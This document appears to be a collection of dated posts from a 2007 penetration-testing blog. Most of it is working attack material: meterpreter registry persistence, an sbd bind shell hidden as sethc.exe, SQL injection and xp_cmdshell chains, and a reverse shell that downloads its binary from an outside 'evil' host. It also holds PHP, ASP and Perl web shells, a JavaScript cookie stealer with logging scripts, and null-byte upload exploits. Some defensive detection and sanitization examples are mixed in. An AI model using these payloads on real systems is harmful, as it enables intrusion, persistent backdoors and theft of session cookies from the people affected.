1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs
eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.
20070330
20070328
Setting and Confirming reg keys w/meterpreter.
super quick meterpreter sequence
Prep
upload c:\\sbdbg.exe c:\\windows\\system32\\
Set
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"
Verify
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor
Use
(reboot)
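A detection-side check for the Run value set above, as an added example that is not part of the original post: it diffs `reg query` output for the Run key against a known-good baseline and flags values whose command line hands a shell to `-e`. The sample output, the baseline and both regular expressions are constructed assumptions.

```python
import re

# Constructed sample of `reg query` output for the Run key (not from a real host).
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    NotSecurityIssueYourLookingFor    REG_SZ    C:\windows\system32\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0
"""

# Assumed known-good baseline: value name -> expected data.
BASELINE = {"VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"'}

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")
# A program started with "-e <shell>" binds a command interpreter to a socket.
SHELL_HANDOFF = re.compile(
    r"(?:^|\s)-e\s+\"?(?:cmd|powershell|command)(?:\.exe|\.com)?\b", re.IGNORECASE)


def parse_reg_query(text):
    """Return {value name: data} for every value line in `reg query` output."""
    values = {}
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            values[match.group("name")] = match.group("data").strip()
    return values


def audit_run_key(text, baseline):
    """Return [(name, [reasons])] for values that deviate from the baseline."""
    findings = []
    for name, data in sorted(parse_reg_query(text).items()):
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        elif baseline[name] != data:
            reasons.append("data changed")
        if SHELL_HANDOFF.search(data):
            reasons.append("command line hands a shell to -e")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_run_key(SAMPLE_OUTPUT, BASELINE):
        print(name, "->", "; ".join(reasons))
```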
20070323
Comparing Common Vulnerability Result Sets
One of the major things I've been working on is bringing together vulnerability result information. I found that it was a major pain in the ass to remove duplicate entries from result sets. I was finally able to come up with a listing based on CVE / BID tracking numbers:
An example corresponding file could be something like this
Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]
Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.
nessus_extract.pl (version 1.7) [download perl]
I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.
One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.
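One way to collapse duplicate findings from two scanners on shared CVE / BID numbers, as an added example that is not the nessus_extract.pl code: rows on the same host are merged when they share any tracking number, directly or through a chain of rows. The column layout and sample rows are constructed, and every CVE / BID value in them is a placeholder.

```python
import csv
import io

# Constructed sample: one finding per row, double-quote qualified, with several
# tracking numbers pipe-separated in one field. All CVE/BID values are placeholders.
SAMPLE = '''host,scanner,title,cve,bid
"10.0.0.5","nessus","Web server overflow, remote","CVE-0000-0001","90001"
"10.0.0.5","guardian","Web server ""rewrite"" overflow","CVE-0000-0001|CVE-0000-0002",""
"10.0.0.5","guardian","Header XSS","cve-0000-0002","90002"
"10.0.0.5","nessus","Legacy protocol enabled","",""
"10.0.0.9","nessus","Web server overflow, remote","CVE-0000-0001","90001"
'''


def split_ids(field, prefix):
    """Split a pipe-separated field into a set of normalised, prefixed ids."""
    return {f"{prefix}:{part.strip().upper()}" for part in field.split("|") if part.strip()}


def merge_findings(text):
    """Merge rows per host that share any CVE or BID; rows without ids stay separate."""
    rows = list(csv.DictReader(io.StringIO(text)))
    parent = list(range(len(rows)))          # union-find forest over row indexes

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]    # path halving
            i = parent[i]
        return i

    first_seen = {}                          # (host, id) -> first row carrying it
    ids_per_row = []
    for i, row in enumerate(rows):
        ids = split_ids(row["cve"], "CVE") | split_ids(row["bid"], "BID")
        ids_per_row.append(ids)
        for tracking_id in ids:
            j = first_seen.setdefault((row["host"], tracking_id), i)
            parent[find(i)] = find(j)

    merged = {}
    for i, row in enumerate(rows):
        entry = merged.setdefault(find(i), {"host": row["host"], "ids": set(),
                                            "scanners": set(), "titles": []})
        entry["ids"] |= ids_per_row[i]
        entry["scanners"].add(row["scanner"])
        entry["titles"].append(row["title"])
    return list(merged.values())


if __name__ == "__main__":
    for entry in merge_findings(SAMPLE):
        print(entry["host"], sorted(entry["ids"]), sorted(entry["scanners"]), entry["titles"])
```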
20070315
Pentest Order of Objects..
ISSAF was used in conjunction with the latest BackTrack release.
Although it is not my company's standard it is quite close.
Not to be too open.. but this has led to a really good idea for object-oriented coding.
Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT
INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Privileged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning
20070313
SBD as netcat
Yeah so I rattle off some SBD stuff sometimes.. I'm referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my preferred "swiss army knife" because of its default configuration of encryption (AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).
Netcat and its NC Clones:
- netcat - "swiss army knife"
- sbd & sbdbg.exe - shadowinteger's backdoor
- netcat6 - swiss army knife+ for ipv6
- cryptcat - netcat with twofish encryption
- socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80
None of this is news.. I just wanted to point out some of this simple stuff.
20070308
sbd fun as a rootkit via sethc.exe
SBD Fun
Transferring files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 -q 10
Transferring files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz -
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337
PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000
Using Cmd.exe to bind to service
In my experience this is flaky at best..
create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc
Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).
SCM starts a service
RegisterServiceCtrlHandler API
We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.
Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}
Rootkit portion
Rename output binary to sethc.exe .. works ok.
Prefetch restrictions.
Remember to delete any existing sethc.exe files in c:\windows\prefetch prior to use.
Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.
Apparently the SYSTEM Kernel security shuts down all unknown processes on sweep @5 minutes into session.
Can there be a fake handler for WM_CLOSE? or terminate...
20070307
PNG Listener w/logger
This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)
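<?php
// Value to log, taken from the "c" query parameter; "init" resets the log.
$cookie = $_GET["c"];
if ($cookie == "init") {
    // Start a fresh log file.
    $file = fopen('001.txt', 'w');
    fwrite($file, ":: 00* Logger:: \n");
} else {
    // Append the requester address and the logged value.
    $file = fopen('001.txt', 'a');
    fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
fclose($file);
// Answer with a 1x1 white PNG so the request renders as an image.
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
?>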
I developed this snippet while working on a solution for browser history leaks.
SQL injection and identification
Identify sql Server through Blind SQL injection
http://example.com/index.php?some_var=1/*!40017%20s*/
MySQL is at least 4.0.17 if you get a different result.
## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access
Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--
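Why the AND 1=1 / AND 1=0 pair above gives a usable signal, and what removes it, as an added example that is not part of the original post: the same lookup is built once by string concatenation and once with a bound parameter, against a constructed in-memory SQLite database. The table, column and function names are assumptions.

```python
import sqlite3

# Constructed probe in the shape of the union template above.
UNION_PROBE = "1 AND 1=0 UNION ALL SELECT pw_hash FROM accounts"


def make_db():
    """Build a throwaway in-memory database with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE accounts (login TEXT, pw_hash TEXT);
        INSERT INTO articles VALUES (1, 'hello world'), (2, 'second post');
        INSERT INTO accounts VALUES ('admin', 'constructed-hash-value');
    """)
    return db


def lookup_vulnerable(db, some_var):
    # Deliberately vulnerable: request input becomes part of the SQL text.
    sql = "SELECT title FROM articles WHERE id = " + some_var
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, some_var):
    # Input is bound as data, so it cannot change the statement's structure.
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in db.execute(sql, (some_var,))]


def probe_signal(lookup, db, base="1"):
    """True when the two boolean probes produce different responses,
    which means the parameter is being evaluated as SQL."""
    return lookup(db, base + " AND 1=1") != lookup(db, base + " AND 1=0")


if __name__ == "__main__":
    db = make_db()
    for lookup in (lookup_vulnerable, lookup_parameterized):
        print(lookup.__name__,
              "| boolean signal:", probe_signal(lookup, db),
              "| union probe returns:", lookup(db, UNION_PROBE))
```

A regression test that asserts `probe_signal` is false for every query-building function catches a reintroduced concatenation before a scanner does.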
MS-SQL
Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))
Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))
MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))
or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))
If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')
Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
20070306
reverse-shell from SQL server
So you got the super secret sa password (or they left it blank~?)
osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"
{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"
Pull data back to SQL:
c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe
Or be obvious:
net user add
On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe
{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp
{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip
{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat
{SQL template} get time on server:
Don't forget ICMP timestamp requests instead..
time
{SQL template} schedule execution of bat file
at \\sql.vuln.box\ 04:20 evil.bat
connect from any.evil.ip
sbd sql.vuln.box 4337
Just some simple shell notes:
Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images
PNG Headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width
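A defensive counterpart to the header bytes above, as an added example that is not part of the original post: it walks a PNG's chunks, verifies each CRC, and reports what an upload filter should refuse, such as a first chunk that is not IHDR, an unknown chunk type like "woot", or code markers inside chunk data. The chunk allowlist, marker list and sample files are constructed assumptions.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
KNOWN = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt",
         b"gAMA", b"cHRM", b"sRGB", b"pHYs", b"tIME", b"bKGD", b"tRNS"}
MARKERS = (b"<?php", b"<?=", b"<script")  # server- or client-side code openers


def chunk(ctype, data):
    """Build one chunk: 4-byte length, 4-byte type, data, CRC32 of type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))


def inspect_png(blob):
    """Return the list of structural problems; empty means nothing was flagged."""
    if not blob.startswith(PNG_SIG):
        return ["bad signature"]
    problems, pos, first, seen_iend = [], len(PNG_SIG), True, False
    while pos < len(blob):
        if pos + 12 > len(blob):
            problems.append("truncated chunk")
            break
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype, end = blob[pos + 4:pos + 8], pos + 12 + length
        if end > len(blob):
            problems.append(f"chunk {ctype!r} overruns the file")
            break
        data = blob[pos + 8:end - 4]
        if struct.unpack(">I", blob[end - 4:end])[0] != zlib.crc32(ctype + data):
            problems.append(f"bad CRC on {ctype!r}")
        if first and ctype != b"IHDR":
            problems.append(f"first chunk is {ctype!r}, not IHDR")
        if ctype not in KNOWN:
            problems.append(f"unknown chunk type {ctype!r}")
        if ctype != b"IDAT" and any(m in data.lower() for m in MARKERS):
            problems.append(f"code marker inside {ctype!r}")
        pos, first = end, False
        if ctype == b"IEND":
            seen_iend = True
            break
    if seen_iend and pos != len(blob):
        problems.append("data after IEND")
    elif not seen_iend:
        problems.append("missing IEND")
    return problems


# Constructed samples. IHDR body: width, height, depth, colour type, 3 method bytes.
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
IDAT = zlib.compress(b"\x00\x00")
CLEAN = PNG_SIG + chunk(b"IHDR", IHDR) + chunk(b"IDAT", IDAT) + chunk(b"IEND", b"")
# Same 13-byte first chunk as in the text, but typed "woot" instead of IHDR.
WOOT = PNG_SIG + chunk(b"woot", IHDR) + chunk(b"IEND", b"")
TEXT = chunk(b"tEXt", b"Comment\x00<?php /* inert placeholder */ ?>")
COMMENTED = PNG_SIG + chunk(b"IHDR", IHDR) + TEXT + chunk(b"IDAT", IDAT) + chunk(b"IEND", b"")
```

Passing this check does not make a file safe to `include`; re-encoding the image server-side and never running uploads through the interpreter remain the actual controls.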
Comment writers for jpegs
edjpgcom
Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>
Using Echo
For windows:
echo: ^(carets) are the escape sequence for systemIO redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext
unix:
write lol from echo with hex (no newline) to file
echo -en "\x6c\x6f\x6c" > file.ext
SBD (netcat style):
File Receiving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"
although plink -raw and telnet are not as good they can work.
Play with Cookies
Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>
Cookie View
Javascript:alert(document.cookie);
Manipulate Cookie
Javascript:void(document.cookie="variable=value");
stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Other stealers
<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");
echo "<script>window.location.replace('".$Redirect."')</script>";
?>
Perl shell
#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
ASP Quicky whoami ?
<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>
ASP Shell
- WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>
Curl into older PHP servers from chroot skeletons.
<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);
$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;
print $data;
?>
Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg
CGI null byte stuff too..
see... php null byte
ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA
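A server-side filename check for the null-byte cases above, as an added example that is not part of the original post: it decodes the name once, rejects NUL and other control characters instead of stripping them, drops any client-supplied path, and only then checks the extension. The allowlist, the stem pattern and the function names are assumptions.

```python
import re
from urllib.parse import unquote

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}   # assumed upload policy
STEM_OK = re.compile(r"[A-Za-z0-9_-]{1,64}")  # no dots, spaces or separators


class RejectedUpload(ValueError):
    """Raised when a client-supplied filename must not be stored."""


def safe_upload_name(raw_name):
    """Return a normalised basename that is safe to store, or raise RejectedUpload."""
    name = unquote(raw_name)                  # a literal "%00" becomes "\x00"
    if unquote(name) != name:
        raise RejectedUpload("name is percent-encoded more than once")
    # Reject rather than strip: lower layers may truncate at NUL and see "x.php".
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        raise RejectedUpload("NUL or control character in name")
    base = re.split(r"[\\/:]", name)[-1]      # drop "c:\..." or "../" prefixes
    stem, dot, ext = base.rpartition(".")
    if not dot or not STEM_OK.fullmatch(stem):
        raise RejectedUpload("unexpected characters or extra extension in name")
    if ext.lower() not in ALLOWED_EXT:
        raise RejectedUpload("extension not on the allowlist")
    return stem + "." + ext.lower()


def is_rejected(raw_name):
    """True when safe_upload_name refuses the name."""
    try:
        safe_upload_name(raw_name)
    except RejectedUpload:
        return True
    return False
```

Storing the upload under a server-generated name and keeping the validated name only as metadata removes the dependency on this check entirely.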